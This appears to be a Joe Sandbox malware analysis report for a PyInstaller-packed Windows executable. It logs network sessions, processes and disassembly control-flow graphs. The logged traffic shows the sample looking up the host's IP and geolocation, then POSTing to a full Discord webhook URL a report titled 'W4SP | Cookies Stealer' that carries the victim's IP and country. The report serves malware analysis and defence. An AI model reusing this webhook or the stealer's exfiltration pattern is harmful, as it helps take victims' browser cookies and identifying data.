                                                                                                                                                                                          Data Ascii: Set-Cookie: _cfuvid=n.lPHJdLyHzhfkSXOBX9GwQ4jeyxZHO.VlJk9c64DgQ-1694151097163-0-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8034ce646bff09f9-LAS


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          6192.168.2.74972664.185.227.156443C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          2023-09-08 05:31:40 UTC6OUTGET / HTTP/1.1
                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                          User-Agent: Python-urllib/3.11
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          2023-09-08 05:31:40 UTC6INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.25.1
                                                                                                                                                                                          Date: Fri, 08 Sep 2023 05:31:40 GMT
                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                          Content-Length: 13
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                          2023-09-08 05:31:40 UTC6INData Raw: 31 39 31 2e 31 30 31 2e 36 31 2e 31 39
                                                                                                                                                                                          Data Ascii: 191.101.61.19


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          7192.168.2.749728159.89.102.253443C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          2023-09-08 05:31:41 UTC6OUTGET /jsonp/191.101.61.19 HTTP/1.1
                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                          Host: geolocation-db.com
                                                                                                                                                                                          User-Agent: Python-urllib/3.11
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          2023-09-08 05:31:42 UTC6INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                          Date: Fri, 08 Sep 2023 05:31:42 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          2023-09-08 05:31:42 UTC6INData Raw: 62 32 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 22 43 68 69 63 61 67 6f 22 2c 22 70 6f 73 74 61 6c 22 3a 22 36 30 36 30 32 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 31 2e 38 34 38 33 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 38 37 2e 36 35 31 37 2c 22 49 50 76 34 22 3a 22 31 39 31 2e 31 30 31 2e 36 31 2e 31 39 22 2c 22 73 74 61 74 65 22 3a 22 49 6c 6c 69 6e 6f 69 73 22 7d 29 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: b2callback({"country_code":"US","country_name":"United States","city":"Chicago","postal":"60602","latitude":41.8483,"longitude":-87.6517,"IPv4":"191.101.61.19","state":"Illinois"})0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          8192.168.2.749735162.159.135.232443C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          2023-09-08 05:31:42 UTC7OUTPOST /api/webhooks/1145292889375641651/LiLYNKzxiXzK4I7mlokWLchk9nrkUSyIf0sFNc2iJ59Y-dUSvo_8s9RlN3C733kDbhnM HTTP/1.1
                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                          Content-Length: 546
                                                                                                                                                                                          Host: ptb.discord.com
                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          2023-09-08 05:31:42 UTC7OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 46 52 4f 4e 54 44 45 53 4b 20 7c 20 31 39 31 2e 31 30 31 2e 36 31 2e 31 39 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 57 34 53 50 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 46 6f 75 6e 64 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3a 63 6f 6f 6b 69 65 3a 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a 20 43 6f 6f 6b 69 65 73 20 46 6f 75 6e 64 5c 6e 3a 6c 69 6e 6b 3a 20 5c 75 32 30 32 32 20 5b 77 34 73 70 43 6f 6f 6b 69 65 73 2e 74 78 74 5d 28 46 61 6c 73 65 29 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 31 34 34 30 36 34
                                                                                                                                                                                          Data Ascii: {"content": ":flag_us: - `user | 191.101.61.19 (United States)`", "embeds": [{"title": "W4SP | Cookies Stealer", "description": "**Found**:\n\n\n**Data:**\n:cookie: \u2022 **0** Cookies Found\n:link: \u2022 [w4spCookies.txt](False)", "color": 144064
                                                                                                                                                                                          2023-09-08 05:31:43 UTC7INHTTP/1.1 204 No Content
                                                                                                                                                                                          Date: Fri, 08 Sep 2023 05:31:43 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          set-cookie: __dcfduid=fe97be504e0811eeb4dd324d2adf1d26; Expires=Wed, 06-Sep-2028 05:31:43 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                          x-ratelimit-limit: 5
                                                                                                                                                                                          x-ratelimit-remaining: 4
                                                                                                                                                                                          x-ratelimit-reset: 1694151104
                                                                                                                                                                                          x-ratelimit-reset-after: 1
                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oYG4Wm3O2w%2F25tNrKSRXo%2BD8vqrn%2FkdKqSR6yEEEHJE7ovJX0zA%2FFncokS7cv9vfrMGn0iQQs285PhnEKmT5lfRcagzfYCBEYVPD9UkCt6c3kBtlRzhMFfqM4W7fFVgDAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                          Set-Cookie: __sdcfduid=fe97be504e0811eeb4dd324d2adf1d26e216ade3357efeb556f1ce9be2d8dc73c7ce9aa60886b6ce1994b05475e53e9f; Expires=Wed, 06-Sep-2028 05:31:43 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                                                                                                                          Set-Cookie: __cfruid=26dac8e550dfe086f73e761dc61b510d72f5509e-1694151103; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                          2023-09-08 05:31:43 UTC9INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 62 63 45 79 63 33 68 7a 43 6d 56 6b 66 66 4d 78 6c 5a 43 6f 5a 34 32 6a 61 32 65 47 78 4b 4c 6a 76 30 69 51 30 63 5a 70 6e 6f 51 2d 31 36 39 34 31 35 31 31 30 33 33 35 31 2d 30 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 30 33 34 63 65 38 62 30 62 65 33 30 39 66 64 2d 4c 41 53 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: Set-Cookie: _cfuvid=bcEyc3hzCmVkffMxlZCoZ42ja2eGxKLjv0iQ0cZpnoQ-1694151103351-0-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8034ce8b0be309fd-LAS


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          9192.168.2.749737173.231.16.76443C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          2023-09-08 05:31:44 UTC9OUTGET / HTTP/1.1
                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                          User-Agent: Python-urllib/3.11
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          2023-09-08 05:31:45 UTC9INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.25.1
                                                                                                                                                                                          Date: Fri, 08 Sep 2023 05:31:44 GMT
                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                          Content-Length: 13
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                          2023-09-08 05:31:45 UTC9INData Raw: 31 39 31 2e 31 30 31 2e 36 31 2e 31 39
                                                                                                                                                                                          Data Ascii: 191.101.61.19


                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                          Start time:07:31:15
                                                                                                                                                                                          Start date:08/09/2023
                                                                                                                                                                                          Path:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          Imagebase:0x7ff701260000
                                                                                                                                                                                          File size:14'042'365 bytes
                                                                                                                                                                                          MD5 hash:7FE90DCF5C49FD85CE12939B8CC3315C
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                          Start time:07:31:19
                                                                                                                                                                                          Start date:08/09/2023
                                                                                                                                                                                          Path:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          Imagebase:0x7ff701260000
                                                                                                                                                                                          File size:14'042'365 bytes
                                                                                                                                                                                          MD5 hash:7FE90DCF5C49FD85CE12939B8CC3315C
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                          Start time:07:31:22
                                                                                                                                                                                          Start date:08/09/2023
                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                                                          Imagebase:0x7ff6f8440000
                                                                                                                                                                                          File size:273'920 bytes
                                                                                                                                                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                          Start time:07:31:22
                                                                                                                                                                                          Start date:08/09/2023
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff751820000
                                                                                                                                                                                          File size:625'664 bytes
                                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Reset < >

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 135 7ff701284e50-7ff701284e8b call 7ff7012847d8 call 7ff7012847e0 call 7ff701284848 142 7ff7012850b5-7ff701285101 call 7ff701279e00 call 7ff7012847d8 call 7ff7012847e0 call 7ff701284848 135->142 143 7ff701284e91-7ff701284e9c call 7ff7012847e8 135->143 169 7ff701285107-7ff701285112 call 7ff7012847e8 142->169 170 7ff70128523f-7ff7012852ad call 7ff701279e00 call 7ff7012806e8 142->170 143->142 148 7ff701284ea2-7ff701284eac 143->148 151 7ff701284ece-7ff701284ed2 148->151 152 7ff701284eae-7ff701284eb1 148->152 153 7ff701284ed5-7ff701284edd 151->153 155 7ff701284eb4-7ff701284ebf 152->155 153->153 156 7ff701284edf-7ff701284ef2 call 7ff70127cafc 153->156 158 7ff701284eca-7ff701284ecc 155->158 159 7ff701284ec1-7ff701284ec8 155->159 165 7ff701284f0a-7ff701284f16 call 7ff701279e48 156->165 166 7ff701284ef4-7ff701284ef6 call 7ff701279e48 156->166 158->151 162 7ff701284efb-7ff701284f09 158->162 159->155 159->158 176 7ff701284f1d-7ff701284f25 165->176 166->162 169->170 178 7ff701285118-7ff701285123 call 7ff701284818 169->178 189 7ff7012852bb-7ff7012852be 170->189 190 7ff7012852af-7ff7012852b6 170->190 176->176 179 7ff701284f27-7ff701284f38 call 7ff70127f954 176->179 178->170 187 7ff701285129-7ff70128514c call 7ff701279e48 GetTimeZoneInformation 178->187 179->142 188 7ff701284f3e-7ff701284f94 call 7ff70126c240 * 4 call 7ff701284d6c 179->188 205 7ff701285214-7ff70128523e call 7ff7012847d0 call 7ff7012847c0 call 7ff7012847c8 187->205 206 7ff701285152-7ff701285173 187->206 247 7ff701284f96-7ff701284f9a 188->247 192 7ff7012852f5-7ff701285308 call 7ff70127cafc 189->192 193 7ff7012852c0 189->193 191 7ff70128534b-7ff70128534e 190->191 197 7ff7012852c3 call 7ff7012850cc 191->197 198 7ff701285354-7ff70128535c call 7ff701284e50 191->198 213 7ff70128530a 192->213 214 7ff701285313-7ff70128532e call 7ff7012806e8 192->214 193->197 210 7ff7012852c8-7ff7012852f4 call 7ff701279e48 call 7ff70126adb0 197->210 198->210 207 7ff70128517e-7ff701285185 206->207 208 7ff701285175-7ff70128517b 206->208 216 7ff701285199 207->216 217 7ff701285187-7ff70128518f 207->217 208->207 221 7ff70128530c-7ff701285311 call 7ff701279e48 213->221 229 7ff701285335-7ff701285347 call 7ff701279e48 214->229 230 7ff701285330-7ff701285333 214->230 225 7ff70128519b-7ff70128520f call 7ff70126c240 * 4 call 7ff701281cac call 7ff701285364 * 2 216->225 217->216 223 7ff701285191-7ff701285197 217->223 221->193 223->225 225->205 229->191 230->221 249 7ff701284f9c 247->249 250 7ff701284fa0-7ff701284fa4 247->250 249->250 250->247 252 7ff701284fa6-7ff701284fcb call 7ff701287c94 250->252 258 7ff701284fce-7ff701284fd2 252->258 260 7ff701284fd4-7ff701284fdf 258->260 261 7ff701284fe1-7ff701284fe5 258->261 260->261 263 7ff701284fe7-7ff701284feb 260->263 261->258 266 7ff701284fed-7ff701285015 call 7ff701287c94 263->266 267 7ff70128506c-7ff701285070 263->267 275 7ff701285017 266->275 276 7ff701285033-7ff701285037 266->276 268 7ff701285077-7ff701285084 267->268 269 7ff701285072-7ff701285074 267->269 271 7ff701285086-7ff70128509c call 7ff701284d6c 268->271 272 7ff70128509f-7ff7012850ae call 7ff7012847d0 call 7ff7012847c0 268->272 269->268 271->272 272->142 279 7ff70128501a-7ff701285021 275->279 276->267 281 7ff701285039-7ff701285057 call 7ff701287c94 276->281 279->276 282 7ff701285023-7ff701285031 279->282 287 7ff701285063-7ff70128506a 281->287 282->276 282->279 287->267 288 7ff701285059-7ff70128505d 287->288 288->267 289 7ff70128505f 288->289 289->287
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF701284E95
                                                                                                                                                                                              • Part of subcall function 00007FF7012847E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7012847FC
                                                                                                                                                                                              • Part of subcall function 00007FF701279E48: RtlReleasePrivilege.NTDLL(?,?,?,00007FF701281E72,?,?,?,00007FF701281EAF,?,?,00000000,00007FF701282375,?,?,?,00007FF7012822A7), ref: 00007FF701279E5E
                                                                                                                                                                                              • Part of subcall function 00007FF701279E48: GetLastError.KERNEL32(?,?,?,00007FF701281E72,?,?,?,00007FF701281EAF,?,?,00000000,00007FF701282375,?,?,?,00007FF7012822A7), ref: 00007FF701279E68
                                                                                                                                                                                              • Part of subcall function 00007FF701279E00: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF701279DDF,?,?,?,?,?,00007FF70127221C), ref: 00007FF701279E09
                                                                                                                                                                                              • Part of subcall function 00007FF701279E00: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF701279DDF,?,?,?,?,?,00007FF70127221C), ref: 00007FF701279E2E
                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF701284E84
                                                                                                                                                                                              • Part of subcall function 00007FF701284848: _invalid_parameter_noinfo.LIBCMT ref: 00007FF70128485C
                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7012850FA
                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF70128510B
                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF70128511C
                                                                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF70128535C), ref: 00007FF701285143
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLastPresentPrivilegeProcessProcessorReleaseTimeZone
                                                                                                                                                                                            • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                                                                                                                                                                            • API String ID: 415722205-986674615
                                                                                                                                                                                            • Opcode ID: d0b24d2932c4ad6ce00caff4c74da18a926a82f58135b852f5126ac34a18b219
                                                                                                                                                                                            • Instruction ID: 013913841442717aa1d5f11a197c76f754f778ef0ac76a367cfcaeaf789b977d
                                                                                                                                                                                            • Opcode Fuzzy Hash: d0b24d2932c4ad6ce00caff4c74da18a926a82f58135b852f5126ac34a18b219
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1ED1CF26B0929386E720FF65DC402B9A7A1EF54794FC48136EA4D87E86DFBCE441C760
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 320 7ff701285d9c-7ff701285e0f call 7ff701285ad0 323 7ff701285e29-7ff701285e33 call 7ff701276d2c 320->323 324 7ff701285e11-7ff701285e1a call 7ff701274454 320->324 330 7ff701285e4e-7ff701285eb7 CreateFileW 323->330 331 7ff701285e35-7ff701285e4c call 7ff701274454 call 7ff701274474 323->331 329 7ff701285e1d-7ff701285e24 call 7ff701274474 324->329 344 7ff70128616a-7ff70128618a 329->344 332 7ff701285eb9-7ff701285ebf 330->332 333 7ff701285f34-7ff701285f3f GetFileType 330->333 331->329 336 7ff701285f01-7ff701285f2f GetLastError call 7ff7012743e8 332->336 337 7ff701285ec1-7ff701285ec5 332->337 339 7ff701285f92-7ff701285f99 333->339 340 7ff701285f41-7ff701285f7c GetLastError call 7ff7012743e8 CloseHandle 333->340 336->329 337->336 342 7ff701285ec7-7ff701285eff CreateFileW 337->342 347 7ff701285f9b-7ff701285f9f 339->347 348 7ff701285fa1-7ff701285fa4 339->348 340->329 355 7ff701285f82-7ff701285f8d call 7ff701274474 340->355 342->333 342->336 349 7ff701285faa-7ff701285fff call 7ff701276c44 347->349 348->349 350 7ff701285fa6 348->350 358 7ff70128601e-7ff70128604f call 7ff701285850 349->358 359 7ff701286001-7ff70128600d call 7ff701285cd8 349->359 350->349 355->329 366 7ff701286055-7ff701286097 358->366 367 7ff701286051-7ff701286053 358->367 359->358 365 7ff70128600f 359->365 370 7ff701286011-7ff701286019 call 7ff701279fc0 365->370 368 7ff7012860b9-7ff7012860c4 366->368 369 7ff701286099-7ff70128609d 366->369 367->370 372 7ff7012860ca-7ff7012860ce 368->372 373 7ff701286168 368->373 369->368 371 7ff70128609f-7ff7012860b4 369->371 370->344 371->368 372->373 375 7ff7012860d4-7ff701286119 CloseHandle CreateFileW 372->375 373->344 377 7ff70128614e-7ff701286163 375->377 378 7ff70128611b-7ff701286149 GetLastError call 7ff7012743e8 call 7ff701276e6c 375->378 377->373 378->377
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1617910340-0
                                                                                                                                                                                            • Opcode ID: 4c9dcb694f9da37b9569774e6528ce897b09f0f884fc50d365155145b1bc53bc
                                                                                                                                                                                            • Instruction ID: fe081fe90d3872cba1eeab55a2649a85796dc3778ac55144c0df90f09187e15d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c9dcb694f9da37b9569774e6528ce897b09f0f884fc50d365155145b1bc53bc
                                                                                                                                                                                            • Instruction Fuzzy Hash: C8C1C136B29A4286EB10EF64C8906AD7771FB49B98B814235DE1E97BD5CF78E051C310
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetTempPathW.KERNEL32(?,?,00000000,?,?,00007FF70126676D), ref: 00007FF701266837
                                                                                                                                                                                              • Part of subcall function 00007FF7012669B0: GetEnvironmentVariableW.KERNEL32(00007FF701263707), ref: 00007FF7012669EA
                                                                                                                                                                                              • Part of subcall function 00007FF7012669B0: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF701266A07
                                                                                                                                                                                              • Part of subcall function 00007FF7012766E4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7012766FD
                                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(?,?,00000000,?,?,00007FF70126676D), ref: 00007FF7012668F1
                                                                                                                                                                                              • Part of subcall function 00007FF701262770: MessageBoxW.USER32 ref: 00007FF701262845
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                                                                                            • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                                                                                            • API String ID: 3752271684-1116378104
                                                                                                                                                                                            • Opcode ID: 1d9e258da007ff631f6f4def1fb3654599ed4050775efbb50ecb9fbb99f68cf7
                                                                                                                                                                                            • Instruction ID: 135ec836b2753b761566e3ab633a51bccb4095d4c570ae1952b43026dcd308d0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d9e258da007ff631f6f4def1fb3654599ed4050775efbb50ecb9fbb99f68cf7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F516911B1A64381FB19B772AD112FAE2419F85BC0FC45035ED0E8B7D6EFACE5058320
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
